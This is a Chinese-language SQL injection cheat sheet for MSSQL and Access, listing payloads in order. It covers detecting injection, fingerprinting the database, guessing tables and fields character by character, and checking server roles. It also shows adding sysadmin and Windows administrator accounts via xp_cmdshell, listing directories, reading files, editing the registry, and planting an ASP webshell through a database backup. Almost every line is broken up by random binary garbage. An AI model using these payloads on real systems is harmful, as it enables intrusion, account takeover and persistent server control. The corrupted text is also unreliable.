1.判断是否有注入;and 1=1 ;and 1=2 SnX)&�>��B
2.初步判断是否是mssql ;and user>0 �3-AOB3](�
��1��4l6|a
3.注入参数是字符'and [查询条件] and ''=' e34g=]"���
A.yIl`'UP#
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 1fV�)t�vU$
�^N^s|c�'
5.判断数据库系统 3�QXs�r<��
5{���!"}�
;and (select count(*) from sysobjects)>0 mssql &*�8.%�qe;
DGTE#�?'(�
;and (select count(*) from msysobjects)>0 access ^} ��Y�}Iz
[uJS.���`b
Y�nU�*M�C}
� `wIWK7i�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �4�Q1R:R�a
}Q9+krr�ow
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��E�:B<�_�
,d��o�sF Q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
K�R��R)pT
f�`r�I]v|@
9.(1)猜字段的ascii值(access) f6\4��,(�)
RkTYvAk|kY
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �a*&&6�F�o
NU'2QS�U8�
(2)猜字段的ascii值(mssql) �"�1>w\21
an�g~_Ec�.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ]��R!YRu�
W�A�tv�4��
10.测试权限结构(mssql) m��$hk�mD|
e�PR9r���}
�A@Zqh<,Ud
e]dFNunFq0
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- kaoiSL<�[6
�p/�l">d]+
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- "�&��`>+Yw
�sV�0�NDM0
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �{KK/mAp{�
]Nss�n\�X7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- X f;�R'a,$
� 8��}AW�U
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- O0_�R�W`69
%h�,�&�N�D
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 5yj��#��9H
U��K�Tf�Lh
;and 1=(select IS_MEMBER('db_owner'));-- SjF(;0k�C
^B}�q@/KV
U�9Ea��}aN
pp{p4�Z� �
11.添加mssql和系统的帐户 ���M0�?%r`
([^f1;nc�m
;exec master.dbo.sp_addlogin username;-- �O.\\)8�xA
;exec master.dbo.sp_password null,username,password;-- 35x��]�'��
D�6fd(=t1Z
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- sO�(4F8cpU
�J�p^��#G2
;exec master.dbo.xp_cmdshell 'net user username password l��,3,�$��
Hr7pcz/#l�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �"(�d�I�/}
jY=M{?�h''
;exec master.dbo.xp_cmdshell 'net user username password /add';-- '{.8tT�?tJ
je�3�Qq1�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- g>gf-2%U�o
,�&fZ�o9J9
3���` D['
g�N��DMJ^`
12.(1)遍历目录 p=k�t�+H&;
>�pJ��#�b=
;create table dirs(paths varchar(100), id int) f/�\S:x-B
\[)SK`�cwd
;insert dirs exec master.dbo.xp_dirtree 'c:\' zKaj��<Og
�D,�lY_6=�
;and (select top 1 paths from dirs)>0 1A#/70Mo��
i�E�_[]Vgc
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) "Y4�glomR[
F?�cwIE\J
|B��'4w�F>
v9KsE2�E�i
(2)遍历目录 BgDWl�{pm
T{-gbo`Yji
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- _Y�}c�K|�3
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 \IudS{
.?;
qHo H�h��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 0 V�G;z#{J
&@BAV�c �z
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 02NVdpo[wU
$<�&_9T#&w
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ]:�'����]
xirq$s��El
0M&�~;�`W}
��x�(4"!#�
13.mssql中的存储过程 h;y�}g�/HZ
VN\VTSZh?\
xp_regenumvalues 注册表根键, 子键 0w<�� i�lJ
bK�zG5|Qu�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 6�U$e;cr�6
:�xb�j&�
l
xp_regread 根键,子键,键值名 v<<�ATs%�w
Iu5 �9W�>
;exec xp_regread $��/@�
�
L
~Lg ;7i1L
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 _O11SiP��]
W�,H=K##6<
xp_regwrite 根键,子键, 值名, 值类型, 值 bhbTlo�CR�
�^w��"hA;
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 G��r�)G-zE
so/0f1R?~�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #b:YY^{g_�
bAN>��\zG+
xp_regdeletevalue 根键,子键,值名 �Xz�qB=iX�
HY?#�r]Ryt
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 v0=v1G*rvJ
`-�R&�4%t%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 )C�{2�0��_
.O(��9\3q\
/me ]�sOkn
o�:�"(��\$
14.mssql的backup创建webshell -1NR]#��P'
�}|N88P��N
use model yGrnz�B6�|
\/gf_�R_GN
create table cmd(str image); �72J=�_d>+
#w�\�x-i�|
insert into cmd(str) values (''); �/vi Ic
%=
O�I�7�8wG�
backup database model to disk='c:\l.asp'; �m|x_++��3
+ @|u8�+�
-"a(<JC^NI
��N;BuBm5K
15.mssql内置函数 f7!48�,(fB
X�eY[;}9
;and (select @@version)>0 获得Windows的版本号 0�aI@���m
I.|b�:c
xN
;and user_name()='dbo' 判断当前系统的连接用户是不是sa H\��E%.QIx
��"�x��HK*
;and (select user_name())>0 爆当前系统的连接用户 iC^G^�~V+H
*��B��{�]
;and (select db_name())>0 得到当前连接的数据库 BD}%RTeWKq
�h8Oj
E$
H
bwP@�}(K��
�U�zI�E,�A
16.简洁的webshell ����'+j;g
w9�RBT(�u�
use model
f<�n�K;��
y�dY 7 �:D
create table cmd(str image); �vlZmmQeJm
+/kOU�z�/]
insert into cmd(str) values (''); ^;( dF<?'r
x%go���yXK
backup database model to disk='g:\wwwtest\l.asp';
